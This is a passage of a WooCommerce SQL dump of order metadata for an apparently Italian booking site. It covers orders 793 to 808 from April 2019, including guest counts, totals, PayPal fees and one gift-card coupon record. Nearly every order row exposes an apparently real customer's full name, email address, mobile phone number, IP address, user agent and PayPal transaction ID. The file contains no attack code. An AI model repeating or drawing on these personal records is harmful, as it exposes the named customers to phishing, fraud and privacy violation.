Fee','8.51'),(16303,793,'_order_key','wc_order_vNY9Vsm2DKdUr'),(16304,793,'_customer_user','0'),(16305,793,'_payment_method','paypal'),(16306,793,'_payment_method_title','PayPal'),(16307,793,'_transaction_id','51J935225B283780A'),(16308,793,'_customer_ip_address','79.53.43.81'),(16309,793,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'),(16310,793,'_created_via','checkout'),(16311,793,'_date_completed',''),(16312,793,'_completed_date',''),(16313,793,'_date_paid','1554556837'),(16314,793,'_paid_date','2019-04-06 15:20:37'),(16315,793,'_cart_hash','b7fba03a84e0d78adebc9b1d961cd29c'),(16316,793,'_billing_first_name','Andrea'),(16317,793,'_billing_last_name','Mennini'),(16318,793,'_billing_company',''),(16319,793,'_billing_address_1',''),(16320,793,'_billing_address_2',''),(16321,793,'_billing_city',''),(16322,793,'_billing_state',''),(16323,793,'_billing_postcode',''),(16324,793,'_billing_country',''),(16325,793,'_billing_email','andrea@mennini.org'),(16326,793,'_billing_phone','335222030'),(16327,793,'_shipping_first_name',''),(16328,793,'_shipping_last_name',''),(16329,793,'_shipping_company',''),(16330,793,'_shipping_address_1',''),(16331,793,'_shipping_address_2',''),(16332,793,'_shipping_city',''),(16333,793,'_shipping_state',''),(16334,793,'_shipping_postcode',''),(16335,793,'_shipping_country',''),(16336,793,'_order_currency','EUR'),(16337,793,'_cart_discount','0'),(16338,793,'_cart_discount_tax','0'),(16339,793,'_order_shipping','0.00'),(16340,793,'_order_shipping_tax','0'),(16341,793,'_order_tax','0'),(16342,793,'_order_total','150.00'),(16343,793,'_order_version','3.5.7'),(16344,793,'_prices_include_tax','no'),(16345,793,'_billing_address_index','Andrea Mennini        andrea@mennini.org 335222030'),(16346,793,'_shipping_address_index','        '),(16347,793,'Quanti adulti?','4'),(16348,793,'Numero bambini fino a 6 anni','1'),(16349,793,'Numero ragazzi fino a 14 anni','0'),(16350,793,'Numero ragazzi dai 15 anni in su','0'),(16351,793,'Files attached','[]'),(16352,793,'Payment type','instant'),(16353,793,'_paypal_status','completed'),(16354,793,'_download_permissions_granted','yes'),(16355,793,'_recorded_sales','yes'),(16356,793,'_recorded_coupon_usage_counts','yes'),(16357,793,'_order_stock_reduced','yes'),(16358,793,'PayPal Transaction Fee','5.45'),(16359,794,'_order_key','wc_order_tuvAL4bPq3KSO'),(16360,794,'_customer_user','0'),(16361,794,'_payment_method','paypal'),(16362,794,'_payment_method_title','PayPal'),(16363,794,'_transaction_id',''),(16364,794,'_customer_ip_address','51.179.106.30'),(16365,794,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(16366,794,'_created_via','checkout'),(16367,794,'_date_completed',''),(16368,794,'_completed_date',''),(16369,794,'_date_paid',''),(16370,794,'_paid_date',''),(16371,794,'_cart_hash','756f73f11b0cec532b23c141ee80f71f'),(16372,794,'_billing_first_name','GUIDO'),(16373,794,'_billing_last_name','MENGONI'),(16374,794,'_billing_company',''),(16375,794,'_billing_address_1',''),(16376,794,'_billing_address_2',''),(16377,794,'_billing_city',''),(16378,794,'_billing_state',''),(16379,794,'_billing_postcode',''),(16380,794,'_billing_country',''),(16381,794,'_billing_email','fabre1409@gmail.com'),(16382,794,'_billing_phone','3920784335'),(16383,794,'_shipping_first_name',''),(16384,794,'_shipping_last_name',''),(16385,794,'_shipping_company',''),(16386,794,'_shipping_address_1',''),(16387,794,'_shipping_address_2',''),(16388,794,'_shipping_city',''),(16389,794,'_shipping_state',''),(16390,794,'_shipping_postcode',''),(16391,794,'_shipping_country',''),(16392,794,'_order_currency','EUR'),(16393,794,'_cart_discount','0'),(16394,794,'_cart_discount_tax','0'),(16395,794,'_order_shipping','0.00'),(16396,794,'_order_shipping_tax','0'),(16397,794,'_order_tax','0'),(16398,794,'_order_total','60.00'),(16399,794,'_order_version','3.5.7'),(16400,794,'_prices_include_tax','no'),(16401,794,'_billing_address_index','GUIDO MENGONI        fabre1409@gmail.com 3920784335'),(16402,794,'_shipping_address_index','        '),(16403,794,'Quanti adulti?','2'),(16404,794,'Numero bambini fino a 6 anni','0'),(16405,794,'Numero ragazzi fino a 14 anni','0'),(16406,794,'Numero ragazzi dai 15 anni in su','0'),(16407,794,'Files attached','[]'),(16408,795,'_order_key','wc_order_MexzCPLs3lOvi'),(16409,795,'_customer_user','0'),(16410,795,'_payment_method','paypal'),(16411,795,'_payment_method_title','PayPal'),(16412,795,'_transaction_id',''),(16413,795,'_customer_ip_address','5.90.170.29'),(16414,795,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(16415,795,'_created_via','checkout'),(16416,795,'_date_completed',''),(16417,795,'_completed_date',''),(16418,795,'_date_paid',''),(16419,795,'_paid_date',''),(16420,795,'_cart_hash','4cc1028c1fa8fe9a42f5fa931ed54c5a'),(16421,795,'_billing_first_name','Luca'),(16422,795,'_billing_last_name','Moschini'),(16423,795,'_billing_company',''),(16424,795,'_billing_address_1',''),(16425,795,'_billing_address_2',''),(16426,795,'_billing_city',''),(16427,795,'_billing_state',''),(16428,795,'_billing_postcode',''),(16429,795,'_billing_country',''),(16430,795,'_billing_email','Lellomoschello@alice.it'),(16431,795,'_billing_phone','3288042513'),(16432,795,'_shipping_first_name',''),(16433,795,'_shipping_last_name',''),(16434,795,'_shipping_company',''),(16435,795,'_shipping_address_1',''),(16436,795,'_shipping_address_2',''),(16437,795,'_shipping_city',''),(16438,795,'_shipping_state',''),(16439,795,'_shipping_postcode',''),(16440,795,'_shipping_country',''),(16441,795,'_order_currency','EUR'),(16442,795,'_cart_discount','0'),(16443,795,'_cart_discount_tax','0'),(16444,795,'_order_shipping','0.00'),(16445,795,'_order_shipping_tax','0'),(16446,795,'_order_tax','0'),(16447,795,'_order_total','60.00'),(16448,795,'_order_version','3.5.7'),(16449,795,'_prices_include_tax','no'),(16450,795,'_billing_address_index','Luca Moschini        Lellomoschello@alice.it 3288042513'),(16451,795,'_shipping_address_index','        '),(16452,795,'Quanti adulti?','2'),(16453,795,'Numero bambini fino a 6 anni','0'),(16454,795,'Numero ragazzi fino a 14 anni','0'),(16455,795,'Numero ragazzi dai 15 anni in su','0'),(16456,795,'Files attached','[]'),(16457,796,'_order_key','wc_order_bjA37cOpmlBVg'),(16458,796,'_customer_user','0'),(16459,796,'_payment_method','paypal'),(16460,796,'_payment_method_title','PayPal'),(16461,796,'_transaction_id','23W136240A0949338'),(16462,796,'_customer_ip_address','146.241.67.249'),(16463,796,'_customer_user_agent','Mozilla/5.0 (Linux; Android 8.1.0; LM-Q610.FGN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36'),(16464,796,'_created_via','checkout'),(16465,796,'_date_completed',''),(16466,796,'_completed_date',''),(16467,796,'_date_paid','1554838345'),(16468,796,'_paid_date','2019-04-09 21:32:25'),(16469,796,'_cart_hash','4cc1028c1fa8fe9a42f5fa931ed54c5a'),(16470,796,'_billing_first_name','Luca'),(16471,796,'_billing_last_name','Moschini'),(16472,796,'_billing_company',''),(16473,796,'_billing_address_1',''),(16474,796,'_billing_address_2',''),(16475,796,'_billing_city',''),(16476,796,'_billing_state',''),(16477,796,'_billing_postcode',''),(16478,796,'_billing_country',''),(16479,796,'_billing_email','lellomoschello@alice.it'),(16480,796,'_billing_phone','3396394858'),(16481,796,'_shipping_first_name',''),(16482,796,'_shipping_last_name',''),(16483,796,'_shipping_company',''),(16484,796,'_shipping_address_1',''),(16485,796,'_shipping_address_2',''),(16486,796,'_shipping_city',''),(16487,796,'_shipping_state',''),(16488,796,'_shipping_postcode',''),(16489,796,'_shipping_country',''),(16490,796,'_order_currency','EUR'),(16491,796,'_cart_discount','0'),(16492,796,'_cart_discount_tax','0'),(16493,796,'_order_shipping','0.00'),(16494,796,'_order_shipping_tax','0'),(16495,796,'_order_tax','0'),(16496,796,'_order_total','60.00'),(16497,796,'_order_version','3.5.7'),(16498,796,'_prices_include_tax','no'),(16499,796,'_billing_address_index','Luca Moschini        lellomoschello@alice.it 3396394858'),(16500,796,'_shipping_address_index','        '),(16501,796,'Quanti adulti?','2'),(16502,796,'Numero bambini fino a 6 anni','0'),(16503,796,'Numero ragazzi fino a 14 anni','0'),(16504,796,'Numero ragazzi dai 15 anni in su','0'),(16505,796,'Files attached','[]'),(16506,796,'Payment type','instant'),(16507,796,'_paypal_status','completed'),(16508,796,'_download_permissions_granted','yes'),(16509,796,'_recorded_sales','yes'),(16510,796,'_recorded_coupon_usage_counts','yes'),(16511,796,'_order_stock_reduced','yes'),(16512,796,'PayPal Transaction Fee','2.39'),(16513,797,'_order_key','wc_order_LYcDwdfdmgq7V'),(16514,797,'_customer_user','0'),(16515,797,'_payment_method','paypal'),(16516,797,'_payment_method_title','PayPal'),(16517,797,'_transaction_id','2K831777VJ750351H'),(16518,797,'_customer_ip_address','79.8.8.57'),(16519,797,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1'),(16520,797,'_created_via','checkout'),(16521,797,'_date_completed',''),(16522,797,'_completed_date',''),(16523,797,'_date_paid','1554845415'),(16524,797,'_paid_date','2019-04-09 23:30:15'),(16525,797,'_cart_hash','33582d3c2c7bc788ea30c76a66f25aaf'),(16526,797,'_billing_first_name','Giulio'),(16527,797,'_billing_last_name','Martello'),(16528,797,'_billing_company',''),(16529,797,'_billing_address_1',''),(16530,797,'_billing_address_2',''),(16531,797,'_billing_city',''),(16532,797,'_billing_state',''),(16533,797,'_billing_postcode',''),(16534,797,'_billing_country',''),(16535,797,'_billing_email','hammer79@live.it'),(16536,797,'_billing_phone','3356969474'),(16537,797,'_shipping_first_name',''),(16538,797,'_shipping_last_name',''),(16539,797,'_shipping_company',''),(16540,797,'_shipping_address_1',''),(16541,797,'_shipping_address_2',''),(16542,797,'_shipping_city',''),(16543,797,'_shipping_state',''),(16544,797,'_shipping_postcode',''),(16545,797,'_shipping_country',''),(16546,797,'_order_currency','EUR'),(16547,797,'_cart_discount','0'),(16548,797,'_cart_discount_tax','0'),(16549,797,'_order_shipping','0.00'),(16550,797,'_order_shipping_tax','0'),(16551,797,'_order_tax','0'),(16552,797,'_order_total','240.00'),(16553,797,'_order_version','3.5.7'),(16554,797,'_prices_include_tax','no'),(16555,797,'_billing_address_index','Giulio Martello        hammer79@live.it 3356969474'),(16556,797,'_shipping_address_index','        '),(16557,797,'Quanti adulti?','4'),(16558,797,'Numero bambini fino a 6 anni','4'),(16559,797,'Numero ragazzi fino a 14 anni','0'),(16560,797,'Numero ragazzi dai 15 anni in su','0'),(16561,797,'Files attached','[]'),(16562,797,'Payment type','instant'),(16563,797,'_paypal_status','completed'),(16564,797,'_download_permissions_granted','yes'),(16565,797,'_recorded_sales','yes'),(16566,797,'_recorded_coupon_usage_counts','yes'),(16567,797,'_order_stock_reduced','yes'),(16568,797,'PayPal Transaction Fee','8.51'),(16569,798,'_order_key','wc_order_XOsoUv5JJnC0i'),(16570,798,'_customer_user','0'),(16571,798,'_payment_method','paypal'),(16572,798,'_payment_method_title','PayPal'),(16573,798,'_transaction_id','29P623023F461621V'),(16574,798,'_customer_ip_address','93.40.209.109'),(16575,798,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'),(16576,798,'_created_via','checkout'),(16577,798,'_date_completed',''),(16578,798,'_completed_date',''),(16579,798,'_date_paid','1554890364'),(16580,798,'_paid_date','2019-04-10 11:59:24'),(16581,798,'_cart_hash','49896fea63d11200cc014db98bf9ef7f'),(16582,798,'_billing_first_name','Senza Limiti srls'),(16583,798,'_billing_last_name','Azienda'),(16584,798,'_billing_company',''),(16585,798,'_billing_address_1','Via Circonvallazione 50'),(16586,798,'_billing_address_2',''),(16587,798,'_billing_city','Riccione'),(16588,798,'_billing_state',''),(16589,798,'_billing_postcode',''),(16590,798,'_billing_country',''),(16591,798,'_billing_email','info@senza-limiti.it'),(16592,798,'_billing_phone','335 7328146'),(16593,798,'_shipping_first_name',''),(16594,798,'_shipping_last_name',''),(16595,798,'_shipping_company',''),(16596,798,'_shipping_address_1',''),(16597,798,'_shipping_address_2',''),(16598,798,'_shipping_city',''),(16599,798,'_shipping_state',''),(16600,798,'_shipping_postcode',''),(16601,798,'_shipping_country',''),(16602,798,'_order_currency','EUR'),(16603,798,'_cart_discount','0'),(16604,798,'_cart_discount_tax','0'),(16605,798,'_order_shipping','0.00'),(16606,798,'_order_shipping_tax','0'),(16607,798,'_order_tax','0'),(16608,798,'_order_total','100.00'),(16609,798,'_order_version','3.5.7'),(16610,798,'_prices_include_tax','no'),(16611,798,'_billing_address_index','Senza Limiti srls Azienda  Via Circonvallazione 50  Riccione    info@senza-limiti.it 335 7328146'),(16612,798,'_shipping_address_index','        '),(16613,798,'Quanti adulti?','2'),(16614,798,'Numero bambini fino a 6 anni','0'),(16615,798,'Numero ragazzi fino a 14 anni','0'),(16616,798,'Numero ragazzi dai 15 anni in su','0'),(16617,798,'Files attached','[]'),(16618,798,'Payment type','instant'),(16619,798,'_paypal_status','completed'),(16620,798,'_download_permissions_granted','yes'),(16621,798,'_recorded_sales','yes'),(16622,798,'_recorded_coupon_usage_counts','yes'),(16623,798,'_order_stock_reduced','yes'),(16624,799,'discount_type','fixed_cart'),(16625,799,'coupon_amount','100'),(16626,799,'individual_use','no'),(16627,799,'usage_limit','1'),(16628,799,'expiry_date','2019-10-07'),(16629,799,'apply_before_tax','no'),(16630,799,'free_shipping','yes'),(16631,799,'minimum_amount',''),(16632,799,'maximum_amount',''),(16633,799,'exclude_sale_items','no'),(16634,799,'exclude_product_categories',''),(16635,799,'exclude_product_ids',''),(16636,799,'mwb_wgm_giftcard_coupon','798'),(16637,799,'mwb_wgm_giftcard_coupon_unique','online'),(16638,799,'mwb_wgm_giftcard_coupon_product_id','548'),(16639,799,'mwb_wgm_giftcard_coupon_mail_to','commerciale@uprise.it'),(16640,798,'798#289','solymarcouponGZE5F'),(16641,798,'mwb_wgm_order_giftcard','send'),(16642,798,'PayPal Transaction Fee','3.75'),(16645,802,'_order_key','wc_order_ssRQRt0WlF2mB'),(16646,802,'_customer_user','0'),(16647,802,'_payment_method','paypal'),(16648,802,'_payment_method_title','PayPal'),(16649,802,'_transaction_id','4ML401412L9560516'),(16650,802,'_customer_ip_address','79.21.206.73'),(16651,802,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 11_2_6 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D100 Safari/604.1'),(16652,802,'_created_via','checkout'),(16653,802,'_date_completed',''),(16654,802,'_completed_date',''),(16655,802,'_date_paid','1555153992'),(16656,802,'_paid_date','2019-04-13 13:13:12'),(16657,802,'_cart_hash','5e2cc3b812687e2327c466a5e962ffcc'),(16658,802,'_billing_first_name','Luca'),(16659,802,'_billing_last_name','Spaggiari'),(16660,802,'_billing_company',''),(16661,802,'_billing_address_1',''),(16662,802,'_billing_address_2',''),(16663,802,'_billing_city',''),(16664,802,'_billing_state',''),(16665,802,'_billing_postcode',''),(16666,802,'_billing_country',''),(16667,802,'_billing_email','l_spaggiari@libero.it'),(16668,802,'_billing_phone','3666783789'),(16669,802,'_shipping_first_name',''),(16670,802,'_shipping_last_name',''),(16671,802,'_shipping_company',''),(16672,802,'_shipping_address_1',''),(16673,802,'_shipping_address_2',''),(16674,802,'_shipping_city',''),(16675,802,'_shipping_state',''),(16676,802,'_shipping_postcode',''),(16677,802,'_shipping_country',''),(16678,802,'_order_currency','EUR'),(16679,802,'_cart_discount','0'),(16680,802,'_cart_discount_tax','0'),(16681,802,'_order_shipping','0.00'),(16682,802,'_order_shipping_tax','0'),(16683,802,'_order_tax','0'),(16684,802,'_order_total','120.00'),(16685,802,'_order_version','3.5.7'),(16686,802,'_prices_include_tax','no'),(16687,802,'_billing_address_index','Luca Spaggiari        l_spaggiari@libero.it 3666783789'),(16688,802,'_shipping_address_index','        '),(16689,802,'Quanti adulti?','2'),(16690,802,'Numero bambini fino a 6 anni','0'),(16691,802,'Numero ragazzi fino a 14 anni','2'),(16692,802,'Numero ragazzi dai 15 anni in su','0'),(16693,802,'Files attached','[]'),(16694,802,'Payment type','instant'),(16695,802,'_paypal_status','completed'),(16696,802,'_download_permissions_granted','yes'),(16697,802,'_recorded_sales','yes'),(16698,802,'_recorded_coupon_usage_counts','yes'),(16699,802,'_order_stock_reduced','yes'),(16700,802,'PayPal Transaction Fee','4.43'),(16701,803,'_order_key','wc_order_WnDJzmefb2pzU'),(16702,803,'_customer_user','0'),(16703,803,'_payment_method','paypal'),(16704,803,'_payment_method_title','PayPal'),(16705,803,'_transaction_id','70H134008W727314J'),(16706,803,'_customer_ip_address','93.40.213.204'),(16707,803,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1'),(16708,803,'_created_via','checkout'),(16709,803,'_date_completed',''),(16710,803,'_completed_date',''),(16711,803,'_date_paid','1555162096'),(16712,803,'_paid_date','2019-04-13 15:28:16'),(16713,803,'_cart_hash','756f73f11b0cec532b23c141ee80f71f'),(16714,803,'_billing_first_name','Simone'),(16715,803,'_billing_last_name','Rossi'),(16716,803,'_billing_company',''),(16717,803,'_billing_address_1',''),(16718,803,'_billing_address_2',''),(16719,803,'_billing_city',''),(16720,803,'_billing_state',''),(16721,803,'_billing_postcode',''),(16722,803,'_billing_country',''),(16723,803,'_billing_email','simonerossi84@gmail.com'),(16724,803,'_billing_phone','3407647907'),(16725,803,'_shipping_first_name',''),(16726,803,'_shipping_last_name',''),(16727,803,'_shipping_company',''),(16728,803,'_shipping_address_1',''),(16729,803,'_shipping_address_2',''),(16730,803,'_shipping_city',''),(16731,803,'_shipping_state',''),(16732,803,'_shipping_postcode',''),(16733,803,'_shipping_country',''),(16734,803,'_order_currency','EUR'),(16735,803,'_cart_discount','0'),(16736,803,'_cart_discount_tax','0'),(16737,803,'_order_shipping','0.00'),(16738,803,'_order_shipping_tax','0'),(16739,803,'_order_tax','0'),(16740,803,'_order_total','60.00'),(16741,803,'_order_version','3.5.7'),(16742,803,'_prices_include_tax','no'),(16743,803,'_billing_address_index','Simone Rossi        simonerossi84@gmail.com 3407647907'),(16744,803,'_shipping_address_index','        '),(16745,803,'Quanti adulti?','2'),(16746,803,'Numero bambini fino a 6 anni','0'),(16747,803,'Numero ragazzi fino a 14 anni','0'),(16748,803,'Numero ragazzi dai 15 anni in su','0'),(16749,803,'Files attached','[]'),(16750,803,'Payment type','instant'),(16751,803,'_paypal_status','completed'),(16752,803,'_download_permissions_granted','yes'),(16753,803,'_recorded_sales','yes'),(16754,803,'_recorded_coupon_usage_counts','yes'),(16755,803,'_order_stock_reduced','yes'),(16756,803,'PayPal Transaction Fee','2.39'),(16757,804,'_order_key','wc_order_0a1SU6ezEuy8x'),(16758,804,'_customer_user','0'),(16759,804,'_payment_method','paypal'),(16760,804,'_payment_method_title','PayPal'),(16761,804,'_transaction_id','9J205736NX8835314'),(16762,804,'_customer_ip_address','37.163.153.246'),(16763,804,'_customer_user_agent','Mozilla/5.0 (Linux; Android 7.0; EVA-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36'),(16764,804,'_created_via','checkout'),(16765,804,'_date_completed',''),(16766,804,'_completed_date',''),(16767,804,'_date_paid','1555171774'),(16768,804,'_paid_date','2019-04-13 18:09:34'),(16769,804,'_cart_hash','2a15a2a19e18cb82759e677cca761799'),(16770,804,'_billing_first_name','Cristiano'),(16771,804,'_billing_last_name','Geremia'),(16772,804,'_billing_company',''),(16773,804,'_billing_address_1',''),(16774,804,'_billing_address_2',''),(16775,804,'_billing_city',''),(16776,804,'_billing_state',''),(16777,804,'_billing_postcode',''),(16778,804,'_billing_country',''),(16779,804,'_billing_email','cristiangeremia@libero.it'),(16780,804,'_billing_phone','3409261968'),(16781,804,'_shipping_first_name',''),(16782,804,'_shipping_last_name',''),(16783,804,'_shipping_company',''),(16784,804,'_shipping_address_1',''),(16785,804,'_shipping_address_2',''),(16786,804,'_shipping_city',''),(16787,804,'_shipping_state',''),(16788,804,'_shipping_postcode',''),(16789,804,'_shipping_country',''),(16790,804,'_order_currency','EUR'),(16791,804,'_cart_discount','0'),(16792,804,'_cart_discount_tax','0'),(16793,804,'_order_shipping','0.00'),(16794,804,'_order_shipping_tax','0'),(16795,804,'_order_tax','0'),(16796,804,'_order_total','150.00'),(16797,804,'_order_version','3.5.7'),(16798,804,'_prices_include_tax','no'),(16799,804,'_billing_address_index','Cristiano Geremia        cristiangeremia@libero.it 3409261968'),(16800,804,'_shipping_address_index','        '),(16801,804,'Quanti adulti?','5'),(16802,804,'Numero bambini fino a 6 anni','2'),(16803,804,'Numero ragazzi fino a 14 anni','0'),(16804,804,'Numero ragazzi dai 15 anni in su','0'),(16805,804,'Files attached','[]'),(16806,804,'Payment type','instant'),(16807,804,'_paypal_status','completed'),(16808,804,'_download_permissions_granted','yes'),(16809,804,'_recorded_sales','yes'),(16810,804,'_recorded_coupon_usage_counts','yes'),(16811,804,'_order_stock_reduced','yes'),(16812,804,'PayPal Transaction Fee','5.45'),(16813,805,'_order_key','wc_order_q4c9dDF03vPfa'),(16814,805,'_customer_user','0'),(16815,805,'_payment_method','paypal'),(16816,805,'_payment_method_title','PayPal'),(16817,805,'_transaction_id','1N17734093529692S'),(16818,805,'_customer_ip_address','5.90.8.234'),(16819,805,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/67.1.233829879 Mobile/15E148 Safari/605.1'),(16820,805,'_created_via','checkout'),(16821,805,'_date_completed',''),(16822,805,'_completed_date',''),(16823,805,'_date_paid','1555173270'),(16824,805,'_paid_date','2019-04-13 18:34:30'),(16825,805,'_cart_hash','8620dff1b45d890ad18be5e103fbee1f'),(16826,805,'_billing_first_name','Cristiano'),(16827,805,'_billing_last_name','Papotti'),(16828,805,'_billing_company',''),(16829,805,'_billing_address_1',''),(16830,805,'_billing_address_2',''),(16831,805,'_billing_city',''),(16832,805,'_billing_state',''),(16833,805,'_billing_postcode',''),(16834,805,'_billing_country',''),(16835,805,'_billing_email','cristianopapotti1@gmail.com'),(16836,805,'_billing_phone','3480745313'),(16837,805,'_shipping_first_name',''),(16838,805,'_shipping_last_name',''),(16839,805,'_shipping_company',''),(16840,805,'_shipping_address_1',''),(16841,805,'_shipping_address_2',''),(16842,805,'_shipping_city',''),(16843,805,'_shipping_state',''),(16844,805,'_shipping_postcode',''),(16845,805,'_shipping_country',''),(16846,805,'_order_currency','EUR'),(16847,805,'_cart_discount','0'),(16848,805,'_cart_discount_tax','0'),(16849,805,'_order_shipping','0.00'),(16850,805,'_order_shipping_tax','0'),(16851,805,'_order_tax','0'),(16852,805,'_order_total','90.00'),(16853,805,'_order_version','3.5.7'),(16854,805,'_prices_include_tax','no'),(16855,805,'_billing_address_index','Cristiano Papotti        cristianopapotti1@gmail.com 3480745313'),(16856,805,'_shipping_address_index','        '),(16857,805,'Quanti adulti?','2'),(16858,805,'Numero bambini fino a 6 anni','0'),(16859,805,'Numero ragazzi fino a 14 anni','1'),(16860,805,'Numero ragazzi dai 15 anni in su','0'),(16861,805,'Files attached','[]'),(16862,805,'Payment type','instant'),(16863,805,'_paypal_status','completed'),(16864,805,'_download_permissions_granted','yes'),(16865,805,'_recorded_sales','yes'),(16866,805,'_recorded_coupon_usage_counts','yes'),(16867,805,'_order_stock_reduced','yes'),(16868,805,'PayPal Transaction Fee','3.41'),(16869,806,'_order_key','wc_order_ygQ0WGRaeyNWL'),(16870,806,'_customer_user','50'),(16871,806,'_payment_method','paypal'),(16872,806,'_payment_method_title','PayPal'),(16873,806,'_transaction_id','04576178A2980911J'),(16874,806,'_customer_ip_address','188.217.45.154'),(16875,806,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1'),(16876,806,'_created_via','checkout'),(16877,806,'_date_completed',''),(16878,806,'_completed_date',''),(16879,806,'_date_paid','1555249652'),(16880,806,'_paid_date','2019-04-14 15:47:32'),(16881,806,'_cart_hash','756f73f11b0cec532b23c141ee80f71f'),(16882,806,'_billing_first_name','Francesco'),(16883,806,'_billing_last_name','Fuochi'),(16884,806,'_billing_company',''),(16885,806,'_billing_address_1',''),(16886,806,'_billing_address_2',''),(16887,806,'_billing_city',''),(16888,806,'_billing_state',''),(16889,806,'_billing_postcode',''),(16890,806,'_billing_country',''),(16891,806,'_billing_email','Glamroom86@gmail.com'),(16892,806,'_billing_phone','3349445431'),(16893,806,'_shipping_first_name',''),(16894,806,'_shipping_last_name',''),(16895,806,'_shipping_company',''),(16896,806,'_shipping_address_1',''),(16897,806,'_shipping_address_2',''),(16898,806,'_shipping_city',''),(16899,806,'_shipping_state',''),(16900,806,'_shipping_postcode',''),(16901,806,'_shipping_country',''),(16902,806,'_order_currency','EUR'),(16903,806,'_cart_discount','0'),(16904,806,'_cart_discount_tax','0'),(16905,806,'_order_shipping','0.00'),(16906,806,'_order_shipping_tax','0'),(16907,806,'_order_tax','0'),(16908,806,'_order_total','60.00'),(16909,806,'_order_version','3.5.7'),(16910,806,'_prices_include_tax','no'),(16911,806,'_billing_address_index','Francesco Fuochi        Glamroom86@gmail.com 3349445431'),(16912,806,'_shipping_address_index','        '),(16913,806,'Quanti adulti?','2'),(16914,806,'Numero bambini fino a 6 anni','1'),(16915,806,'Numero ragazzi fino a 14 anni','0'),(16916,806,'Numero ragazzi dai 15 anni in su','0'),(16917,806,'Files attached','[]'),(16918,806,'Payment type','instant'),(16919,806,'_paypal_status','completed'),(16920,806,'_download_permissions_granted','yes'),(16921,806,'_recorded_sales','yes'),(16922,806,'_recorded_coupon_usage_counts','yes'),(16923,806,'_order_stock_reduced','yes'),(16924,806,'PayPal Transaction Fee','2.39'),(16925,807,'_order_key','wc_order_hItykYDwKdFtT'),(16926,807,'_customer_user','0'),(16927,807,'_payment_method','paypal'),(16928,807,'_payment_method_title','PayPal'),(16929,807,'_transaction_id','3R476622DN431253R'),(16930,807,'_customer_ip_address','79.11.193.152'),(16931,807,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),(16932,807,'_created_via','checkout'),(16933,807,'_date_completed',''),(16934,807,'_completed_date',''),(16935,807,'_date_paid','1555343076'),(16936,807,'_paid_date','2019-04-15 17:44:36'),(16937,807,'_cart_hash','4cc1028c1fa8fe9a42f5fa931ed54c5a'),(16938,807,'_billing_first_name','FEDERICO'),(16939,807,'_billing_last_name','ROSIGNOLI'),(16940,807,'_billing_company',''),(16941,807,'_billing_address_1',''),(16942,807,'_billing_address_2',''),(16943,807,'_billing_city',''),(16944,807,'_billing_state',''),(16945,807,'_billing_postcode',''),(16946,807,'_billing_country',''),(16947,807,'_billing_email','ROSIGNOLI.FEDERICO@OUTLOOK.IT'),(16948,807,'_billing_phone','3383851848'),(16949,807,'_shipping_first_name',''),(16950,807,'_shipping_last_name',''),(16951,807,'_shipping_company',''),(16952,807,'_shipping_address_1',''),(16953,807,'_shipping_address_2',''),(16954,807,'_shipping_city',''),(16955,807,'_shipping_state',''),(16956,807,'_shipping_postcode',''),(16957,807,'_shipping_country',''),(16958,807,'_order_currency','EUR'),(16959,807,'_cart_discount','0'),(16960,807,'_cart_discount_tax','0'),(16961,807,'_order_shipping','0.00'),(16962,807,'_order_shipping_tax','0'),(16963,807,'_order_tax','0'),(16964,807,'_order_total','60.00'),(16965,807,'_order_version','3.5.7'),(16966,807,'_prices_include_tax','no'),(16967,807,'_billing_address_index','FEDERICO ROSIGNOLI        ROSIGNOLI.FEDERICO@OUTLOOK.IT 3383851848'),(16968,807,'_shipping_address_index','        '),(16969,807,'Quanti adulti?','2'),(16970,807,'Numero bambini fino a 6 anni','0'),(16971,807,'Numero ragazzi fino a 14 anni','0'),(16972,807,'Numero ragazzi dai 15 anni in su','0'),(16973,807,'Files attached','[]'),(16974,807,'Payment type','instant'),(16975,807,'_paypal_status','completed'),(16976,807,'_download_permissions_granted','yes'),(16977,807,'_recorded_sales','yes'),(16978,807,'_recorded_coupon_usage_counts','yes'),(16979,807,'_order_stock_reduced','yes'),(16980,807,'PayPal Transaction Fee','2.39'),(16981,808,'_order_key','wc_order_3GUMz1RyY9Ln0'),(16982,808,'_customer_user','51'),(16983,808,'_payment_method','paypal'),(16984,808,'_payment_method_title','PayPal'),(16985,808,'_transaction_id',''),(16986,808,'_customer_ip_address','93.40.4.232'),(16987,808,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16D57 Instagram 88.0.0.17.98 (iPhone10,6; iOS 12_1_4; it_IT; it-IT; scale=3.00; gamut=wide; 1125x2436; 